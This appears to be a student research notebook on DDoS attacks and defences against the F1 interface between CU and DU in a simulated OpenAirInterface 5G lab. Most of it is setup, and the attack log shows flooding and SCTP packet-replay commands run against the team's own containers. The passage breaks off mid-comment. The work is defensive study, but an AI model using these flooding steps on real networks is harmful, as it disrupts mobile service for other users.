# Project roadmap

## Properties

| type | content |
|:--|:--|
| Given topic | "5G base station attack and defense between CU and DU" |
| Chosen interface | F1 |
| Chosen attack | DDoS |
| Chosen attack route | - Massive UE connection<br>- UDP flood<br>- PDU session / bearer flooding<br>- Handover, Tracking Area Update<br>- UE context management, RRC/PDCP signalling exchange |
| Chosen structure | E1 split & multiple CU-UP/DU/UE<br>(CN + CU-CP + 2 CU-UPs + 3 DUs/RUs + 4 UEs) ![{9E52C86A-CA7A-448F-B5E9-3D00361DF083}](https://hackmd.io/_uploads/rJv3zxa8lg.png) |
| Chosen detection | |
| Chosen defence | |
| Chosen project title | "Design and Evaluation of DDoS Attacks and Defences on the F1 Interface for Open RAN-based 5G Systems" |

## Procedure

- Initial work
  - [x] Topic selection
  - [x] Base system setting
  - [x] Find open-source DoS attack tools
- Part I: Attack
  - [x] Try various attacks
  - [ ] Upgrade attack
  - [ ] Verify attack
- Part II: Detection
  - [ ] Make monitoring tool
- Part III: Defence
  - [ ] Try various defences
  - [ ] Upgrade defence
- Wrapping stage
  - [ ] Produce project report
  - Consider how to introduce it to others
    - [ ] Interaction idea

## Research log & Schedule

| Week # | Period | Joon | Miracle |
|:--|:--|:--|:--|
| 41 | 06.10. - 06.16. | [review attacks]() | [make detecting tool](https://hackmd.io/@V2BwvPo9SWWFiy3BHGiAhQ/r13EFibbgx) |
| 42 | 06.17. - 06.23. | [set base system](https://hackmd.io/@intJoon/SyLy7X0kee#Edit) | [upgrade detecting tool](https://hackmd.io/@V2BwvPo9SWWFiy3BHGiAhQ/Hk6mekxVgl) |
| 43 | 06.24. - 06.30. | [fix attacks]() | [try various defense](https://hackmd.io/@V2BwvPo9SWWFiy3BHGiAhQ/rJrY_29Vlg) |
| 44 | 07.01. - 07.07. | [fix attacks2]() | [upgrade attacks](https://hackmd.io/@V2BwvPo9SWWFiy3BHGiAhQ/SJ_wf5XBlx) |
| 45 | 07.08. - 07.14. | [upgrade attacks2]() | [upgrade detecting tool](https://hackmd.io/@V2BwvPo9SWWFiy3BHGiAhQ/rJ1rEVqSge) |
| 46 | 07.15. - 07.21. | [upgrade attacks3]() | [upgrade detecting tool2](https://hackmd.io/@V2BwvPo9SWWFiy3BHGiAhQ/Bk1Do7ULgg) |
| 47 | 07.22. - 07.28. | [finish detecting tool]() | [try various defence2](https://hackmd.io/@V2BwvPo9SWWFiy3BHGiAhQ/S1LtVSyPxe) |
| 48 | 07.29. - 08.04. | try various defence3 | upgrade defence |
| 49 | 08.05. - 08.11. | upgrade defence2 | consider scenario |
| 50 | 08.12. - 08.18. | consider scenario2 | make project report |
| 51 | 08.19. - 08.25. | finish project report | finish project report |
| 52 | 08.26. - 09.01. | consider demo | consider demo |

# Initial work

## Topic selection

:::spoiler Attack type
| type | pros | cons |
|:--|:--|:--|
| Man-in-the-Middle | - Intercept & modify traffic<br>- Significant impact | - Requires network control<br>- Blocked by encryption / integrity checks |
| Denial of Service | - Simple to launch<br>- Disruptive impact | - High resource cost<br>- Easily detected<br>- Rate limiting reduces effect |
| Signal Tampering | - Protocol message replay<br>-> confusion | - Needs protocol knowledge<br>- Fails under MAC-I<br>- Short attack window |
| Auth Bypass & Spoofing | - Fake node<br>-> potential control | - Strong auth blocks it<br>- Requires credentials / advanced exploit |

-> **DoS/DDoS** selected
:::

:::spoiler Attack route & reference
| route | attack type | key reference sections<br>(3GPP TS 38.47x, F1) |
|:--|:--|:--|
| F1-C / F1AP | - MITM<br>- False gNB<br>- DoS | - F1AP (TS 38.473): 7, 8.2-8.4, 8.7, 8.14, 10 |
| F1-U (GTP-U/UDP/IP) | - Header modification<br>- Session hijack<br>- DDoS | - F1 DT, data transport (TS 38.474): 4, 5.1-5.4<br>- F1 ST, signalling transport (TS 38.472): 4-7 |
| UE Context Management | - Session hijack<br>- Replay attack | - F1AP: 8.3, 9.2.2 |
| RRC/Paging/Warning Messages | - Public safety disruption | - F1AP: 8.4, 8.5, 8.7 |
| NR MBS Procedures | - Multiple attack surfaces | - F1AP: 8.14 |
| Positioning / Measurement | - Privacy breach<br>- Location tracing | - F1AP: 8.13 |

-> **F1-C, F1-U** selected
:::

## Base system setting

:::spoiler Step I: Core system
> [CN reference](https://gitlab.eurecom.fr/oai/openairinterface5g/-/blob/develop/doc/NR_SA_Tutorial_OAI_CN5G.md)
> [gNB & UE reference](https://gitlab.eurecom.fr/oai/openairinterface5g/-/blob/develop/doc/NR_SA_Tutorial_OAI_nrUE.md?ref_type=heads#2-oai-cn5g)

#### Build
```bash=
# CN
sudo apt install -y git net-tools putty
sudo apt update
sudo apt install -y ca-certificates curl
sudo install -m 0755 -d /etc/apt/keyrings
sudo curl -fsSL https://download.docker.com/linux/ubuntu/gpg -o /etc/apt/keyrings/docker.asc
sudo chmod a+r /etc/apt/keyrings/docker.asc
echo "deb [arch=$(dpkg --print-architecture) signed-by=/etc/apt/keyrings/docker.asc] https://download.docker.com/linux/ubuntu $(. /etc/os-release && echo "$VERSION_CODENAME") stable" | sudo tee /etc/apt/sources.list.d/docker.list > /dev/null
sudo apt update
sudo apt install -y docker-ce docker-ce-cli containerd.io docker-buildx-plugin docker-compose-plugin
sudo usermod -a -G docker $(whoami)
reboot   # so the new docker group membership takes effect
wget -O ~/oai-cn5g.zip https://gitlab.eurecom.fr/oai/openairinterface5g/-/archive/develop/openairinterface5g-develop.zip?path=doc/tutorial_resources/oai-cn5g
unzip ~/oai-cn5g.zip
mv ~/openairinterface5g-develop-doc-tutorial_resources-oai-cn5g/doc/tutorial_resources/oai-cn5g ~/oai-cn5g
rm -r ~/openairinterface5g-develop-doc-tutorial_resources-oai-cn5g ~/oai-cn5g.zip
cd ~/oai-cn5g
docker compose pull

# gNB and UE
sudo apt install -y autoconf automake build-essential ccache cmake cpufrequtils doxygen ethtool g++ git inetutils-tools libboost-all-dev libncurses-dev libusb-1.0-0 libusb-1.0-0-dev libusb-dev python3-dev python3-mako python3-numpy python3-requests python3-scipy python3-setuptools python3-ruamel.yaml
git clone https://github.com/EttusResearch/uhd.git ~/uhd
cd ~/uhd
git checkout v4.8.0.0
cd host
mkdir build
cd build
cmake ../
make -j $(nproc)
make test   # This step is optional
sudo make install
sudo ldconfig
sudo uhd_images_downloader
git clone https://gitlab.eurecom.fr/oai/openairinterface5g.git ~/openairinterface5g
cd ~/openairinterface5g
git checkout develop
cd ~/openairinterface5g/cmake_targets
./build_oai -I
sudo apt install -y libforms-dev libforms-bin
cd ~/openairinterface5g/cmake_targets
./build_oai -w USRP --ninja --nrUE --gNB --build-lib "nrscope" -C
```

#### Commands
```bash=
# Run CN
cd ~/oai-cn5g
docker compose up -d

# Run gNB
cd ~/openairinterface5g/cmake_targets/ran_build/build
sudo ./nr-softmodem -O ../../../targets/PROJECTS/GENERIC-NR-5GC/CONF/gnb.sa.band78.fr1.106PRB.usrpb210.conf --gNBs.[0].min_rxtxtime 6 --rfsim

# Run UE
cd ~/openairinterface5g/cmake_targets/ran_build/build
sudo ./nr-uesoftmodem -r 106 --numerology 1 --band 78 -C 3619200000 --uicc0.imsi 001010000000001 --rfsim

# End-to-end connectivity test
ping 192.168.70.135 -I oaitun_ue1

# Stop CN
cd ~/oai-cn5g
docker compose down
```
:::

:::spoiler Step II: Split gNB
> [Docker reference](https://gitlab.eurecom.fr/oai/openairinterface5g/-/blob/develop/ci-scripts/yaml_files/5g_rfsimulator/README.md)
> [Commands reference](https://gitlab.eurecom.fr/oai/openairinterface5g/-/tree/develop/ci-scripts/yaml_files/5g_rfsimulator_e1)

#### Build
```bash=
# CN
sudo apt install docker-compose
docker login
# The tags pulled here must match the image tags referenced in docker-compose.yaml
# (the custom file in Step III pins v2.1.9); compose pulls whatever the file names on first `up`.
docker pull mysql:8.0
docker pull oaisoftwarealliance/oai-amf:v2.1.10
docker pull oaisoftwarealliance/oai-smf:v2.1.10
docker pull oaisoftwarealliance/oai-upf:v2.1.10
docker pull oaisoftwarealliance/trf-gen-cn5g:focal
docker pull oaisoftwarealliance/oai-gnb:develop
docker pull oaisoftwarealliance/oai-nr-ue:develop
docker logout
```

#### Commands
```bash=
# Run CN
cd ~/openairinterface5g/ci-scripts/yaml_files/5g_rfsimulator_e1
docker-compose up -d mysql oai-amf oai-smf oai-upf
docker-compose ps -a   # Wait until the services report healthy

# Run gNB
cd ~/openairinterface5g/ci-scripts/yaml_files/5g_rfsimulator_e1
docker-compose up -d oai-cucp oai-cuup{,2,3} oai-du{,2,3}
docker-compose ps -a   # Wait until the services report healthy

# Run UE
cd ~/openairinterface5g/ci-scripts/yaml_files/5g_rfsimulator_e1
docker-compose up -d oai-nr-ue{,2,3}

# Test
cd ~/openairinterface5g/ci-scripts/yaml_files/5g_rfsimulator_e1
docker-compose ps -a
docker logs rfsim5g-oai-cucp
docker logs rfsim5g-oai-cucp | grep CU-U
docker logs -f rfsim5g-oai-cuup
docker logs -f rfsim5g-oai-cuup2
docker logs -f rfsim5g-oai-cuup3
docker logs rfsim5g-oai-du
docker logs rfsim5g-oai-du2
docker logs rfsim5g-oai-du3
docker logs rfsim5g-oai-nr-ue
docker logs rfsim5g-oai-nr-ue2
docker logs rfsim5g-oai-nr-ue3
docker exec -it rfsim5g-oai-nr-ue ip a show oaitun_ue1
docker exec -it rfsim5g-oai-nr-ue2 ip a show oaitun_ue1
docker exec -it rfsim5g-oai-nr-ue3 ip a show oaitun_ue1
docker exec -it rfsim5g-oai-nr-ue ping -c1 12.1.1.2   # UE IPs may differ; check `ip a` above
docker exec -it rfsim5g-oai-nr-ue ping -c1 12.1.1.3
docker exec -it rfsim5g-oai-nr-ue ping -c1 12.1.1.4

# Stop all
docker compose stop oai-nr-ue{,2,3}
docker compose down
```
:::

:::spoiler Step III: Custom system
> openairinterface5g/ci-scripts/yaml_files/5g_rfsimulator_e1/docker-compose.yaml

#### Edit
```yaml=
services:
  mysql:
    container_name: "rfsim5g-mysql"
    image: mysql:8.0
    init: true
    volumes:
      - ../5g_rfsimulator/oai_db.sql:/docker-entrypoint-initdb.d/oai_db.sql
      - ../5g_rfsimulator/mysql-healthcheck.sh:/tmp/mysql-healthcheck.sh
    environment:
      - TZ=Europe/Paris
      - MYSQL_DATABASE=oai_db
      - MYSQL_USER=test
      - MYSQL_PASSWORD=test
      - MYSQL_ROOT_PASSWORD=linux
    healthcheck:
      test: /bin/bash -c "/tmp/mysql-healthcheck.sh"
      start_period: 10s
      start_interval: 500ms
      interval: 10s
      timeout: 5s
      retries: 30
    networks:
      core_net:
        ipv4_address: 192.168.71.131
  oai-amf:
    container_name: "rfsim5g-oai-amf"
    image: oaisoftwarealliance/oai-amf:v2.1.9
    environment:
      - TZ=Europe/Paris
    volumes:
      - ./mini_nonrf_config_3slices.yaml:/openair-amf/etc/config.yaml
    depends_on:
      - mysql
    networks:
      core_net:
        ipv4_address: 192.168.71.132
  oai-smf:
    container_name: "rfsim5g-oai-smf"
    image: oaisoftwarealliance/oai-smf:v2.1.9
    environment:
      - TZ=Europe/Paris
    volumes:
      - ./mini_nonrf_config_3slices.yaml:/openair-smf/etc/config.yaml
    depends_on:
      - oai-amf
    networks:
      core_net:
        ipv4_address: 192.168.71.133
  oai-upf:
    container_name: "rfsim5g-oai-upf"
    image: oaisoftwarealliance/oai-upf:v2.1.9
    init: true
    environment:
      - TZ=Europe/Paris
    volumes:
      - ./mini_nonrf_config_3slices.yaml:/openair-upf/etc/config.yaml
    depends_on:
      - oai-smf
    cap_add:
      - NET_ADMIN
      - SYS_ADMIN
    cap_drop:
      - ALL
    privileged: true
    networks:
      core_net:
        ipv4_address: 192.168.71.134
        interface_name: eth0
      traffic_net:
        ipv4_address: 192.168.72.134
        interface_name: eth1
  oai-cucp:
    image: ${REGISTRY:-oaisoftwarealliance}/${GNB_IMG:-oai-gnb}:${TAG:-develop}
    container_name: rfsim5g-oai-cucp
    cap_drop:
      - ALL
    environment:
      USE_ADDITIONAL_OPTIONS: --log_config.global_log_options level,nocolor,time --gNBs.[0].E1_INTERFACE.[0].ipv4_cucp 192.168.77.2 --gNBs.[0].local_s_address 192.168.72.2
      ASAN_OPTIONS: detect_leaks=0
    depends_on:
      - oai-upf
    networks:
      core_net:
        ipv4_address: 192.168.71.150
      f1c_net:
        ipv4_address: 192.168.72.2
      e1_net:
        ipv4_address: 192.168.77.2
    volumes:
      - ../../conf_files/gnb-cucp.sa.f1.conf:/opt/oai-gnb/etc/gnb.conf
    healthcheck:
      test: /bin/bash -c "pgrep nr-softmodem"
      start_period: 10s
      start_interval: 500ms
      interval: 10s
      timeout: 5s
      retries: 5
  oai-cuup:
    image: ${REGISTRY:-oaisoftwarealliance}/${NRCUUP_IMG:-oai-nr-cuup}:${TAG:-develop}
    container_name: rfsim5g-oai-cuup
    cap_drop:
      - ALL
    environment:
      USE_ADDITIONAL_OPTIONS: --log_config.global_log_options level,nocolor,time --gNBs.[0].E1_INTERFACE.[0].ipv4_cucp 192.168.77.2 --gNBs.[0].E1_INTERFACE.[0].ipv4_cuup 192.168.77.3 --gNBs.[0].local_s_address 192.168.73.2 --gNBs.[0].remote_s_address 127.0.0.1
      ASAN_OPTIONS: detect_leaks=0
    depends_on:
      - oai-cucp
    networks:
      core_net:
        ipv4_address: 192.168.71.161
      f1u_1_net:
        ipv4_address: 192.168.73.2
      e1_net:
        ipv4_address: 192.168.77.3
    volumes:
      - ../../conf_files/gnb-cuup.sa.f1.conf:/opt/oai-gnb/etc/gnb.conf
    healthcheck:
      test: /bin/bash -c "pgrep nr-cuup"
      start_period: 10s
      start_interval: 500ms
      interval: 10s
      timeout: 5s
      retries: 5
  oai-cuup2:
    image: ${REGISTRY:-oaisoftwarealliance}/${NRCUUP_IMG:-oai-nr-cuup}:${TAG:-develop}
    container_name: rfsim5g-oai-cuup2
    cap_drop:
      - ALL
    environment:
      USE_ADDITIONAL_OPTIONS: --log_config.global_log_options level,nocolor,time --gNBs.[0].gNB_CU_UP_ID 0xe01 --gNBs.[0].E1_INTERFACE.[0].ipv4_cucp 192.168.77.2 --gNBs.[0].E1_INTERFACE.[0].ipv4_cuup 192.168.77.4 --gNBs.[0].local_s_address 192.168.74.2 --gNBs.[0].remote_s_address 127.0.0.1 --gNBs.[0].NETWORK_INTERFACES.GNB_IPV4_ADDRESS_FOR_NGU 192.168.71.162 --gNBs.[0].plmn_list.[0].snssaiList.[0].sst 2
      ASAN_OPTIONS: detect_leaks=0
    depends_on:
      - oai-cucp
    networks:
      core_net:
        ipv4_address: 192.168.71.162
      f1u_2_net:
        ipv4_address: 192.168.74.2
      e1_net:
        ipv4_address: 192.168.77.4
    volumes:
      - ../../conf_files/gnb-cuup.sa.f1.conf:/opt/oai-gnb/etc/gnb.conf
    healthcheck:
      test: /bin/bash -c "pgrep nr-cuup"
      start_period: 10s
      start_interval: 500ms
      interval: 10s
      timeout: 5s
      retries: 5
  oai-du:
    image: ${REGISTRY:-oaisoftwarealliance}/${GNB_IMG:-oai-gnb}:${TAG:-develop}
    container_name: rfsim5g-oai-du
    cap_drop:
      - ALL
    environment:
      USE_ADDITIONAL_OPTIONS: --rfsim --log_config.global_log_options level,nocolor,time --MACRLCs.[0].local_n_address 192.168.72.3 --MACRLCs.[0].remote_n_address oai-cucp --MACRLCs.[0].local_n_address_f1u 192.168.73.3
      ASAN_OPTIONS: detect_leaks=0
    depends_on:
      - oai-cucp
      - oai-cuup
    networks:
      f1c_net:
        ipv4_address: 192.168.72.3
      f1u_1_net:
        ipv4_address: 192.168.73.3
      ue_net:
        ipv4_address: 192.168.78.2
    volumes:
      - ../../conf_files/gnb-du.sa.band78.106prb.rfsim.conf:/opt/oai-gnb/etc/gnb.conf
    healthcheck:
      test: /bin/bash -c "pgrep nr-softmodem"
      start_period: 10s
      start_interval: 500ms
      interval: 10s
      timeout: 5s
      retries: 5
  oai-du2:
    image: ${REGISTRY:-oaisoftwarealliance}/${GNB_IMG:-oai-gnb}:${TAG:-develop}
    container_name: rfsim5g-oai-du2
    cap_drop:
      - ALL
    environment:
      USE_ADDITIONAL_OPTIONS: --rfsim --log_config.global_log_options level,nocolor,time --gNBs.[0].gNB_DU_ID 0xe01 --gNBs.[0].nr_cellid 87654321 --gNBs.[0].servingCellConfigCommon.[0].physCellId 1 --MACRLCs.[0].remote_n_address oai-cucp --MACRLCs.[0].local_n_address 192.168.72.4 --MACRLCs.[0].local_n_address_f1u 192.168.74.3
      ASAN_OPTIONS: detect_leaks=0
    depends_on:
      - oai-cucp
      - oai-cuup2
    networks:
      f1c_net:
        ipv4_address: 192.168.72.4
      f1u_2_net:
        ipv4_address: 192.168.74.3
      ue_net:
        ipv4_address: 192.168.78.3
    volumes:
      - ../../conf_files/gnb-du.sa.band78.106prb.rfsim.conf:/opt/oai-gnb/etc/gnb.conf
    healthcheck:
      test: /bin/bash -c "pgrep nr-softmodem"
      start_period: 10s
      start_interval: 500ms
      interval: 10s
      timeout: 5s
      retries: 5
  oai-du3:
    image: ${REGISTRY:-oaisoftwarealliance}/${GNB_IMG:-oai-gnb}:${TAG:-develop}
    container_name: rfsim5g-oai-du3
    cap_drop:
      - ALL
    environment:
      USE_ADDITIONAL_OPTIONS: --rfsim --log_config.global_log_options level,nocolor,time --gNBs.[0].gNB_DU_ID 0xe02 --gNBs.[0].nr_cellid 11111111 --gNBs.[0].servingCellConfigCommon.[0].physCellId 2 --MACRLCs.[0].remote_n_address oai-cucp --MACRLCs.[0].local_n_address 192.168.72.5 --MACRLCs.[0].local_n_address_f1u 192.168.74.4
      ASAN_OPTIONS: detect_leaks=0
    depends_on:
      - oai-cucp
      - oai-cuup2
      - oai-du2
    networks:
      f1c_net:
        ipv4_address: 192.168.72.5
      f1u_2_net:
        ipv4_address: 192.168.74.4
      ue_net:
        ipv4_address: 192.168.78.4
    volumes:
      - ../../conf_files/gnb-du.sa.band78.106prb.rfsim.conf:/opt/oai-gnb/etc/gnb.conf
    healthcheck:
      test: /bin/bash -c "pgrep nr-softmodem"
      start_period: 10s
      start_interval: 500ms
      interval: 10s
      timeout: 5s
      retries: 5
  oai-nr-ue:
    image: ${REGISTRY:-oaisoftwarealliance}/${NRUE_IMG:-oai-nr-ue}:${TAG:-develop}
    container_name: rfsim5g-oai-nr-ue
    cap_drop:
      - ALL
    cap_add:
      - NET_ADMIN  # for interface bringup
      - NET_RAW    # for ping
    environment:
      USE_ADDITIONAL_OPTIONS: --rfsim --log_config.global_log_options level,nocolor,time -r 106 --numerology 1 -C 3619200000 --uicc0.imsi 208990100001100 --rfsimulator.serveraddr oai-du
    depends_on:
      - oai-du
    networks:
      ue_net:
        ipv4_address: 192.168.78.5
    devices:
      - /dev/net/tun:/dev/net/tun
    volumes:
      - ../../conf_files/nrue.uicc.conf:/opt/oai-nr-ue/etc/nr-ue.conf
    healthcheck:
      test: /bin/bash -c "pgrep nr-uesoftmodem"
      start_period: 10s
      start_interval: 500ms
      interval: 10s
      timeout: 5s
      retries: 5
  oai-nr-ue2:
    image: ${REGISTRY:-oaisoftwarealliance}/${NRUE_IMG:-oai-nr-ue}:${TAG:-develop}
    container_name: rfsim5g-oai-nr-ue2
    cap_drop:
      - ALL
    cap_add:
      - NET_ADMIN  # for interface bringup
      - NET_RAW    # for ping
    environment:
      USE_ADDITIONAL_OPTIONS: --rfsim --log_config.global_log_options level,nocolor,time -r 106 --numerology 1 -C 3619200000 --uicc0.imsi 208990100001101 --uicc0.nssai_sst 2 --rfsimulator.serveraddr 192.168.78.3
    depends_on:
      - oai-du2
    networks:
      ue_net:
        ipv4_address: 192.168.78.6
    devices:
      - /dev/net/tun:/dev/net/tun
    volumes:
      - ../../conf_files/nrue.uicc.conf:/opt/oai-nr-ue/etc/nr-ue.conf
    healthcheck:
      test: /bin/bash -c "pgrep nr-uesoftmodem"
      start_period: 10s
      start_interval: 500ms
      interval: 10s
      timeout: 5s
      retries: 5
  oai-nr-ue3:
    image: ${REGISTRY:-oaisoftwarealliance}/${NRUE_IMG:-oai-nr-ue}:${TAG:-develop}
    container_name: rfsim5g-oai-nr-ue3
    cap_drop:
      - ALL
    cap_add:
      - NET_ADMIN  # for interface bringup
      - NET_RAW    # for ping
    environment:
      USE_ADDITIONAL_OPTIONS: --rfsim --log_config.global_log_options level,nocolor,time -r 106 --numerology 1 -C 3619200000 --uicc0.imsi 208990100001102 --uicc0.nssai_sst 2 --rfsimulator.serveraddr 192.168.78.4
      ASAN_OPTIONS: detect_leaks=0
    depends_on:
      - oai-du3
    networks:
      ue_net:
        ipv4_address: 192.168.78.7
    devices:
      - /dev/net/tun:/dev/net/tun
    volumes:
      - ../../conf_files/nrue.uicc.conf:/opt/oai-nr-ue/etc/nr-ue.conf
    healthcheck:
      test: /bin/bash -c "pgrep nr-uesoftmodem"
      start_period: 10s
      start_interval: 500ms
      interval: 10s
      timeout: 5s
      retries: 5
  oai-nr-ue4:
    image: ${REGISTRY:-oaisoftwarealliance}/${NRUE_IMG:-oai-nr-ue}:${TAG:-develop}
    container_name: rfsim5g-oai-nr-ue4
    cap_drop:
      - ALL
    cap_add:
      - NET_ADMIN  # for interface bringup
      - NET_RAW    # for ping
    environment:
      USE_ADDITIONAL_OPTIONS: --rfsim --log_config.global_log_options level,nocolor,time -r 106 --numerology 1 -C 3619200000 --uicc0.imsi 208990100001103 --uicc0.nssai_sst 2 --rfsimulator.serveraddr 192.168.78.4
      ASAN_OPTIONS: detect_leaks=0
    depends_on:
      - oai-du3
    networks:
      ue_net:
        ipv4_address: 192.168.78.8
    devices:
      - /dev/net/tun:/dev/net/tun
    volumes:
      - ../../conf_files/nrue.uicc.conf:/opt/oai-nr-ue/etc/nr-ue.conf
    healthcheck:
      test: /bin/bash -c "pgrep nr-uesoftmodem"
      start_period: 10s
      start_interval: 500ms
      interval: 10s
      timeout: 5s
      retries: 5
networks:
  core_net:
    driver: bridge
    name: rfsim5g-oai-core-net
    ipam:
      config:
        - subnet: 192.168.71.128/26
    driver_opts:
      com.docker.network.bridge.name: "rfsim5g-core"
  traffic_net:
    driver: bridge
    name: rfsim5g-oai-traffic-net
    ipam:
      config:
        - subnet: 192.168.72.128/26
    driver_opts:
      com.docker.network.bridge.name: "rfsim5g-traffic"
  f1c_net:
    driver: bridge
    name: rfsim5g-oai-f1c-net
    ipam:
      config:
        - subnet: 192.168.72.0/28
    driver_opts:
      com.docker.network.bridge.name: "rfsim5g-f1c"
  f1u_1_net:
    driver: bridge
    name: rfsim5g-oai-f1u-1-net
    ipam:
      config:
        - subnet: 192.168.73.0/28
    driver_opts:
      com.docker.network.bridge.name: "rfsim5g-f1u_1"
  f1u_2_net:
    driver: bridge
    name: rfsim5g-oai-f1u-2-net
    ipam:
      config:
        - subnet: 192.168.74.0/28
    driver_opts:
      com.docker.network.bridge.name: "rfsim5g-f1u_2"
  e1_net:
    driver: bridge
    name: rfsim5g-oai-e1-net
    ipam:
      config:
        - subnet: 192.168.77.0/28
    driver_opts:
      com.docker.network.bridge.name: "rfsim5g-e1"
  ue_net:
    driver: bridge
    name: rfsim5g-oai-ue-net
    ipam:
      config:
        - subnet: 192.168.78.0/28
    driver_opts:
      com.docker.network.bridge.name: "rfsim5g-ue"
```

#### Commands
```bash=
# Run system
cd ~/openairinterface5g/ci-scripts/yaml_files/5g_rfsimulator_e1
docker compose up -d mysql oai-amf oai-smf oai-upf          # CN
docker compose up -d oai-cucp oai-cuup{,2} oai-du{,2,3}     # gNB
docker compose up -d oai-nr-ue
docker compose up -d oai-nr-ue2
docker compose up -d oai-nr-ue3
docker compose up -d oai-nr-ue4

# Show system health
docker compose ps -a

# Show logs
docker logs -f rfsim5g-oai-cucp
docker logs -f rfsim5g-oai-cuup
docker logs -f rfsim5g-oai-cuup2
docker logs -f rfsim5g-oai-du
docker logs -f rfsim5g-oai-du2
docker logs -f rfsim5g-oai-du3
docker logs -f rfsim5g-oai-nr-ue
docker logs -f rfsim5g-oai-nr-ue2
docker logs -f rfsim5g-oai-nr-ue3
docker logs -f rfsim5g-oai-nr-ue4

# Find UE IP
docker exec -it rfsim5g-oai-nr-ue ip a show oaitun_ue1
docker exec -it rfsim5g-oai-nr-ue2 ip a show oaitun_ue1
docker exec -it rfsim5g-oai-nr-ue3 ip a show oaitun_ue1
docker exec -it rfsim5g-oai-nr-ue4 ip a show oaitun_ue1

# Test service status
docker exec -it rfsim5g-oai-nr-ue2 ping -c5 12.1.1.2   # UE IPs may differ; check `ip a` above
docker exec -it rfsim5g-oai-nr-ue ping -c5 12.1.1.3
docker exec -it rfsim5g-oai-nr-ue ping -c5 12.1.1.4
docker exec -it rfsim5g-oai-nr-ue ping -c5 12.1.1.5

# Show resource usage
docker stats

# Stop system
docker compose stop oai-nr-ue{,2,3,4}
docker compose down
```
:::

or

:::spoiler Download from GitHub
{%preview https://github.com/intJoon/sp5g.git %}
:::

# Part I: Attack

## Steps

- Try various attacks
  - F1-C, control plane
    - [x] Massive UE connection
    - [ ] UE context management, RRC/PDCP signalling exchange
    - [ ] Handover, Tracking Area Update
    - [ ] PDU session / bearer flooding
  - F1-U, user plane
    - [x] UDP flood
  - F1AP vulnerability
    - [ ] Information sniffing (IP / access permission)
    - [ ] Fuzzing (arbitrary input, cause a crash, find zero-days)
  - None of the above
    - Not related: F1-C carries F1AP over SCTP and F1-U carries GTP-U over UDP, so attacks that depend on TCP, HTTP or ICMP never reach the F1 protocol stack
      - Ping of death (oversized ICMP echo)
      - Smurfing (ICMP echo to a broadcast address with a spoofed source)
      - TCP SYN flood
      - Random access channel flooding (Uu air interface, not F1)
      - Land attack (source IP = destination IP, so the victim answers itself)
- Upgrade attack
  - [ ] Try sniffing (eases the attack precondition)
  - [ ] Consider optional security
  - [ ] Consider static / dynamic / dependency analysis
  - [ ] Automate the attack
  - [ ] Fast flux
  - [ ] Make it distributed (upgrade to DDoS, e.g. botnet)
- [ ] Verify attack

## Tools

- docker
- tcpdump
- tshark / wireshark
- socat
- tcpreplay

## Try various attacks

### F1-C

:::spoiler Massive UE connection - Joon
| category | detail |
|:--|:--|
| System | CN + monolithic gNB + 8 UE / 16 UE |
| Hardware | 8 GB RAM -> 8 UE, 16 GB RAM -> 16 UE |
| Tools | N/A |
| Condition | Many UEs |
| Result | Service slows; UE list full -> new UEs cannot attach |
| Found | Ubuntu = 2 GB, UE ~> CN |
| Drawback | UE cost goes up |
| Comment | No malfunction, so this is not really an attack |

> Service slows; UE list full -> new UEs cannot attach
![image](https://hackmd.io/_uploads/HJ9JcPwgxe.png)

```bash=
# Run CN
cd ~/oai-cn5g
docker compose up -d

# Run gNB
cd ~/openairinterface5g/cmake_targets/ran_build/build
sudo ./nr-softmodem -O ../../../targets/PROJECTS/GENERIC-NR-5GC/CONF/gnb.sa.band78.fr1.106PRB.usrpb210.conf --gNBs.[0].min_rxtxtime 6 --rfsim

# Run UEs (one per terminal, each with its own IMSI)
cd ~/openairinterface5g/cmake_targets/ran_build/build
sudo ./nr-uesoftmodem -r 106 --numerology 1 --band 78 -C 3619200000 --uicc0.imsi 001010000000001 --rfsim
sudo ./nr-uesoftmodem -r 106 --numerology 1 --band 78 -C 3619200000 --uicc0.imsi 001010000000002 --rfsim
sudo ./nr-uesoftmodem -r 106 --numerology 1 --band 78 -C 3619200000 --uicc0.imsi 001010000000003 --rfsim
sudo ./nr-uesoftmodem -r 106 --numerology 1 --band 78 -C 3619200000 --uicc0.imsi 001010000000004 --rfsim
...
```
:::

:::spoiler UE context manage - Joon
| category | detail |
|:--|:--|
| System | CN + F1/E1 split gNB (1 CU-CP / 3 CU-UP / 3 DU) + 4 UE |
| Hardware | 8 GB RAM |
| Tools | python-scapy |
| Condition | Known IP |
| Result | No impact |
| Found | |
| Drawback | |
| Comment | |

> Before attack
![{1CAF0DF6-9045-4A2C-BE7D-08123297A559}](https://hackmd.io/_uploads/Sy4Ox80kgx.png)

---

> Recorded F1AP packets
![{E751054A-B6AE-4386-B985-7ADD9C6672F9}](https://hackmd.io/_uploads/HJXEpqylgg.png)

```bash=
# Record traffic towards the CU-CP (Ctrl+C to stop)
sudo tcpdump -i any dst host 192.168.72.2 -w cu-cp-all.pcap

# Extract one CU-CP packet (frame 58 in this capture) as a hex dump
tshark -r cu-cp-all.pcap -Y "frame.number==58" -x > cu-cp-uesetup.hex

# Create attacker container on the F1-C network
docker stop attacker
docker rm attacker
docker run -dit --name attacker --network rfsim5g-oai-f1c-net ubuntu:24.04 bash

# Attacker container setup
docker cp flood_uesetup.py attacker:/root/
docker exec -it attacker bash
apt update && apt install -y python3-scapy python3-pip libpcap-dev python3-venv tcpreplay python3-full
python3 -m venv /root/venv
source /root/venv/bin/activate
pip install --upgrade pip
pip install scapy

# Attack
python3 /root/flood_uesetup.py
# -> No reaction at all, what now..
# In docker stats the attacker container's CPU goes from 0 to about 22%, but cu-cp does not move at all, so apparently there is no impact.
# docker logs rfsim5g-oai-cucp shows nothing new either,
# and in the Ubuntu system monitor only network usage goes up, then drops back once the flooding ends.

# lksctp-tools client: open a real SCTP association from the attacker to the CU-CP and send (-s: sender mode)
sctp_test -H 192.168.72.6 -P 50000 -h 192.168.72.2 -p 38472 -s -d 2 -x 1

# Capture on the UE side
docker exec -it rfsim5g-oai-nr-ue bash
apt update
apt install -y tcpdump
tcpdump -i oaitun_ue1 -w /root/ue_capture.pcap
```

```bash=
sudo apt install socat

# Cut frame 58 out of the capture and turn its hex dump back into raw bytes
tshark -r cu-cp-all.pcap -Y "frame.number==58" -w extract.pcap
tshark -r extract.pcap -x | grep -oE '([0-9a-f]{2} ){16}' | tr -d ' ' | xxd -r -p > packet.bin
# Caveat: the grep keeps only full 16-byte rows (the shorter last row is lost), and the bytes
# still begin with the link/IP/SCTP headers of the captured frame, so what socat hands to the
# CU-CP as SCTP payload is the whole frame, not an F1AP PDU. socat also sends with PPID 0,
